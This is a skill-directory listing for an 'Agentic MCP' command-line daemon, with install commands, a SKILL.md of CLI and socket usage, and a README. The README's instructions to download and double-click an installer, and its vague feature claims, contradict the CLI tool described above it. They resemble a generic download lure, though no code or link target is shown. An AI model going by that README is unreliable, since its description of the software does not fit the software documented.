bioeu

agentic-mcp

0
0
# Install this skill:
npx skills add bioeu/Agentic-MCP-Skill

Or install specific skill: npx add-skill https://github.com/bioeu/Agentic-MCP-Skill

# Description

Agentic MCP - Three-layer progressive disclosure for MCP servers with Socket daemon. Use when the user needs to interact with MCP servers, query available tools, call MCP tools, or manage the MCP daemon process. Provides socket-based communication for efficient server interaction with three-layer progressive disclosure API.

# SKILL.md


name: agentic-mcp
description: Agentic MCP - Three-layer progressive disclosure for MCP servers with Socket daemon. Use when the user needs to interact with MCP servers, query available tools, call MCP tools, or manage the MCP daemon process. Provides socket-based communication for efficient server interaction with three-layer progressive disclosure API.


Agentic MCP

Quick start

agentic-mcp daemon start --config <mcp-servers.json path>  # Start daemon
agentic-mcp metadata <server-name>                  # Get server info
agentic-mcp list <server-name>                      # List tools
agentic-mcp schema <server-name> <tool-name>        # Get tool schema
agentic-mcp call <server-name> <tool-name> --params '{"arg":"value"}'  # Call tool
agentic-mcp daemon stop                             # Stop daemon

Core workflow

  1. agentic-mcp daemon start - Start daemon
  2. agentic-mcp metadata <server> - Layer 1: server info
  3. agentic-mcp list <server> - Layer 2: available tools
  4. agentic-mcp schema <server> <tool> - Layer 3: tool details
  5. agentic-mcp call <server> <tool> --params '{"arg":"value"}' - Execute tool

Daemon management

agentic-mcp daemon start                           # Start daemon
agentic-mcp daemon health                          # Check status
agentic-mcp daemon reload                          # Reload config
agentic-mcp daemon stop                            # Stop daemon
agentic-mcp daemon start --config <path>           # Custom config

Sessions (isolated instances):

MCP_DAEMON_SESSION=<name> agentic-mcp daemon start

Query commands

agentic-mcp metadata <server>                      # Server info
agentic-mcp list <server>                          # List tools
agentic-mcp schema <server> <tool>                 # Tool schema
agentic-mcp daemon health                          # Check daemon status

Tool calls

agentic-mcp call <server> <tool> --params '{"argName":"value"}'

All parameters must be JSON object via --params.

JSON mode:

agentic-mcp metadata <server> --json
agentic-mcp call <server> <tool> --params '{"arg":"value"}' --json

Configuration

mcp-servers.json:

{
  "servers": {
    "<server-name>": {
      "command": "npx",
      "args": ["-y", "@scope/mcp-server"]
    }
  }
}

Socket protocol

Command (newline-delimited JSON):

{"id":"1","action":"metadata","server":"<server>"}

Response:

{"id":"1","success":true,"data":{...}}

Platform: Windows (TCP) / Unix (domain socket)

Examples

Basic usage:

agentic-mcp daemon start
agentic-mcp metadata <server>
agentic-mcp list <server>
agentic-mcp schema <server> <tool>
agentic-mcp call <server> <tool> --params '{"arg":"value"}'

Multiple sessions:

MCP_DAEMON_SESSION=proj1 agentic-mcp daemon start
MCP_DAEMON_SESSION=proj2 agentic-mcp daemon start

Debugging

agentic-mcp daemon health                          # Check status
agentic-mcp daemon reload                          # Reload after config change

Errors

βœ— MCP daemon is not running
βœ— Server '<name>' not found
βœ— Tool '<name>' not found
βœ— Required argument '<name>' not provided

# README.md

🌟 Agentic-MCP-Skill - Use MCP Efficiently and Easily

πŸ“₯ Download the Application

Download Agentic-MCP-Skill

πŸš€ Getting Started

Welcome to Agentic-MCP-Skill! This application helps you use the Model Context Protocol (MCP) effectively. It features lazy loading to save time and resources. You can start using MCP without needing to pre-install anything or waiting for a full load.

πŸ“‹ System Requirements

Before downloading, ensure your system meets the following requirements:
- Operating System: Windows 10 or later, macOS Mojave or later, or a recent Linux distribution.
- Memory: At least 4 GB of RAM.
- Disk Space: Minimum of 100 MB free.

πŸ’» Installation Steps

Follow these simple steps to download and install Agentic-MCP-Skill:

  1. Visit the Releases Page
    Go to the releases page for Agentic-MCP-Skill:
    Download Page

  2. Choose the Latest Release
    Look for the latest version listed on the releases page. The version number will be clearly indicated.

  3. Download the Application
    Click on the appropriate file for your operating system to download the application.

  4. Run the Installer
    Once the download completes, locate the file on your computer. Double-click the downloaded file to run the installer.

  5. Follow the Installation Instructions
    The setup wizard will guide you through the installation process. Just follow the on-screen instructions.

  6. Launch the Application
    After installation, you can find the app in your program list. Click to open and start using Agentic-MCP-Skill!

🌐 Features

Agentic-MCP-Skill provides several key benefits to enhance your experience:
- Lazy Loading: Reduces waiting time when using MCP. The app only loads what you need when you need it.
- Efficiency: Validates patterns for token usage to make your work easier and faster.
- User-Friendly Interface: Designed for average users, no programming knowledge is needed.

βš™οΈ Troubleshooting

If you encounter issues, try the following steps:

  • Reinstall the Application: Sometimes, a fresh install can solve problems.
  • Check System Requirements: Ensure your device meets the requirements listed above.
  • Restart Your Device: A simple restart can fix various glitches.
  • Visit the FAQ: Check the FAQ section on the releases page for additional support.

πŸ”§ Support

Need help? You can contact support through the issues section of our GitHub repository. Describe your problem clearly for quicker assistance.


For any further updates or new releases, please keep an eye on our Releases Page.

# Supported AI Coding Agents

This skill is compatible with the SKILL.md standard and works with all major AI coding agents:

Learn more about the SKILL.md standard and how to use these skills with your preferred AI coding agent.